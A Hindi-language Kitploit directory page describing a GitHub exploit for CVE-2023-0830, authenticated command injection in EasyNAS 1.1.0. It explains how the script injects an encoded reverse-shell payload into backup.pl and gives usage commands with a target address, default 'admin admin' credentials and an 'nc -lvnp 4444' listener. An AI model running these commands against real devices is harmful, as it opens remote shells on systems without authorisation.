Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-0830 — EasyNAS संस्करण 1.1.0 के लिए शोषण। जिस कमजोरी का शोषण किया गया है वह एक command injection दोष है, जिसके लिए प्रमाणीकरण आवश्यक है। | Kitploit
उपकरण/GitHubGitHub/xbz0n/cve-2023-0830
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

EasyNAS संस्करण 1.1.0 के लिए शोषण। जिस कमजोरी का शोषण किया गया है वह एक command injection दोष है, जिसके लिए प्रमाणीकरण आवश्यक है।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-0830: EasyNAS 1.1.0 प्रमाणित OS कमांड इंजेक्शन शोषण

यह Python स्क्रिप्ट EasyNAS संस्करण 1.1.0 के लिए एक शक्तिशाली शोषण है जिसमें एकीकृत श्रोता सहित उन्नत कार्यक्षमता है। शोषित की गई कमजोरी एक कमांड इंजेक्शन दोष है, जिसके लिए प्रमाणीकरण की आवश्यकता होती है।

स्क्रिप्ट लक्ष्य सर्वर के साथ एक सत्र स्थापित करती है, फिर उपयोगकर्ता द्वारा प्रदान की गई साख के साथ लॉगिन अनुरोध भेजती है। सफल प्रमाणीकरण पर, स्क्रिप्ट एक पेलोड बनाती है, जो निष्पादित होने पर, उपयोगकर्ता द्वारा निर्दिष्ट IP और पोर्ट पर एक रिवर्स शेल कनेक्शन खोलता है। यह पेलोड URL और Base64 एन्कोडेड होता है और फिर एक तैयार किए गए GET अनुरोध के माध्यम से सर्वर पर backup.pl फ़ाइल में इंजेक्ट किया जाता है।

CVE: CVE-2023-0830

शोषण लेखक

Ivan Spiridonov (xbz0n) https://xbz0n.sh

विक्रेता का होम पेज

https://www.easynas.org

विशेषताएँ

  • एकीकृत रिवर्स शेल श्रोता - अलग netcat प्रक्रिया की आवश्यकता नहीं
  • श्रोता के लिए स्वचालित IP पता पहचान
  • विभिन्न शेल प्रकारों का उपयोग करने का विकल्प (bash, sh, python)
  • HTTP और HTTPS दोनों के लिए समर्थन
  • बाहरी श्रोताओं के लिए समर्थन

उपयोग

एकीकृत श्रोता के साथ मूल उपयोग (अनुशंसित):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin

बाहरी श्रोता का उपयोग करना (पहले nc -lvnp 4444 शुरू करें):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444

विकल्प:

root@kitploit:~
--mode {shell,reverse}    शोषण मोड: shell (एकीकृत रिवर्स शेल) या reverse (बाहरी श्रोता)
--lhost IP_ADDRESS        रिवर्स शेल श्रोता के लिए IP पता (डिफ़ॉल्ट रूप से स्वतः पहचाना जाता है)
--lport PORT              रिवर्स शेल श्रोता के लिए पोर्ट (डिफ़ॉल्ट: 4444)
--protocol {http,https}   उपयोग करने के लिए प्रोटोकॉल (डिफ़ॉल्ट: https)
--verbose                 वर्बोज़ आउटपुट सक्षम करें
--shell {bash,sh,python}  एकीकृत श्रोता के साथ उपयोग करने के लिए शेल प्रकार निर्दिष्ट करें (डिफ़ॉल्ट: bash)

निर्भरताएँ

  • Python 3
  • Requests लाइब्रेरी

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। किसी भी नेटवर्क या सिस्टम के खिलाफ पैठ परीक्षण चलाने से पहले हमेशा स्पष्ट अनुमति लें।

कृपया जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें